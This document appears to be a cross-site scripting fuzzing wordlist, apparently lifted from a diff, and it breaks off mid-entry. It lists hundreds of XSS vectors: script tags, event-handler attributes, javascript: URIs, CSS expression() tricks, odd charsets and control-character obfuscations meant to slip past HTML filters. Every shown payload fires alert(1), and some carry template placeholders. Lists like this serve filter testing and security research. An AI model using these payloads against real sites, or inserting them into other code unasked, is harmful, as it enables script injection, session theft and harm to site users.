+"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input 
onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. 
/,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! 
foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= 
alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> 
+<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" 
to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> 
+<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html 
xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +</script><script>alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html 
onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee 
onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body 
onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> +<script>/* *\x00/javascript:alert(1)// */</script> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> 
+<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 